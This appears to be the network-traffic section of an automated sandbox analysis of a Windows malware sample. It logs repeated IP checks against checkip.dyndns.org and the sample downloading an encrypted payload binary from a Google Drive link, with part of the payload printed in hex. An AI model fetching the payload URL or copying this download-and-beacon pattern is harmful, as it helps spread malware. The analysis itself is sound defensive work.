                                                                                                                    Jan 11, 2025 07:24:38.814771891 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:39.440491915 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:39 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.450047193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:40.343822002 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:40.979767084 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:40 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.450049193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:41.919287920 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:42.564404011 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:42 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.450051193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:43.484508038 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:44.159471035 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.450053193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:45.078433037 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:46.205355883 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:46 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.450055193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:47.171161890 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:48.144056082 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:48 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.450057193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:49.090821981 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:49.716588974 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:49 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.450059193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:50.574296951 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:51.204070091 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:51 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.450061193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:52.270922899 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:53.232875109 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:53 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.450063193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:54.277167082 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:54.903897047 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:54 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.450065193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:56.132576942 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:57.528477907 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:57 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.450067193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:58.435825109 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:59.092860937 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:59 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.450069193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:59.957814932 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:25:01.718718052 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:25:01 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.450071193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:25:02.718065023 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:25:09.606848955 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:25:09 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    34192.168.2.450073193.122.6.16880
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:25:13.015896082 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:25:14.402019024 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:25:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449736142.250.181.2384437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:23:54 UTC216OUTGET /uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                    Host: drive.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-11 06:23:54 UTC1920INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Sat, 11 Jan 2025 06:23:54 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'nonce-tJjbM-CejE69DFwRTR07dQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449737142.250.185.2254437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:23:55 UTC258OUTGET /download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:23:57 UTC4940INHTTP/1.1 200 OK
                                                                                                                    X-GUploader-UploadID: AFIdbgSIIXmWR7_iaIw9vT4x7RdBT2oHPVCBUgYchXWArhRxMCZn5KaMNsJLR3M2f9RTcbTwitZhkRc
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Content-Disposition: attachment; filename="EfvrItttis189.bin"
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 94272
                                                                                                                    Last-Modified: Sun, 15 Dec 2024 10:15:31 GMT
                                                                                                                    Date: Sat, 11 Jan 2025 06:23:57 GMT
                                                                                                                    Expires: Sat, 11 Jan 2025 06:23:57 GMT
                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                    X-Goog-Hash: crc32c=fmqCJw==
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2025-01-11 06:23:57 UTC4940INData Raw: 3b d9 c2 f6 cf be f7 00 d2 76 61 69 e6 ea f6 7f 11 2a 4b 26 1f 45 a0 8c 17 97 d0 c0 c5 a4 fe 90 93 be 39 9c c1 2b dd 40 2d 2e 82 23 c1 06 69 f7 97 2e dd 85 8a b9 07 b9 78 47 00 cf 3b c1 25 ce 3a cc 47 6c b3 ba 2c 10 00 af 39 ee 6d 24 35 89 46 0d 23 d9 20 ea a1 79 62 94 96 83 79 28 b4 ce 33 3c 5e 79 3d e3 0b b3 d6 4b 50 57 3c fb e8 00 11 70 45 8b db b8 73 bc d0 b1 0d ff 11 53 9b 3e 7e 9d 34 bb 5e 47 e3 a1 43 d5 01 25 8f 77 7e 84 ba d6 51 4a 96 1d 5c 1e fb da d8 40 5f 42 13 3e 3e 1f 6a 7a 79 29 a9 72 70 83 cd 3f 2a 7e 64 03 9a 3f d0 45 53 ec 31 23 8f a2 76 4d db 08 68 1a d3 4d b0 27 bd 99 0b 19 d2 5a df 05 c0 bf ee a5 e4 27 b3 f4 7c df ab 48 d0 39 96 be 9f 26 fd 0c 79 ea 92 6f f8 d0 0b 3e 70 0e 1a 22 57 24 50 98 1d c0 ea 1d 05 41 b7 59 cf fe 13 0c 2b 8f fe
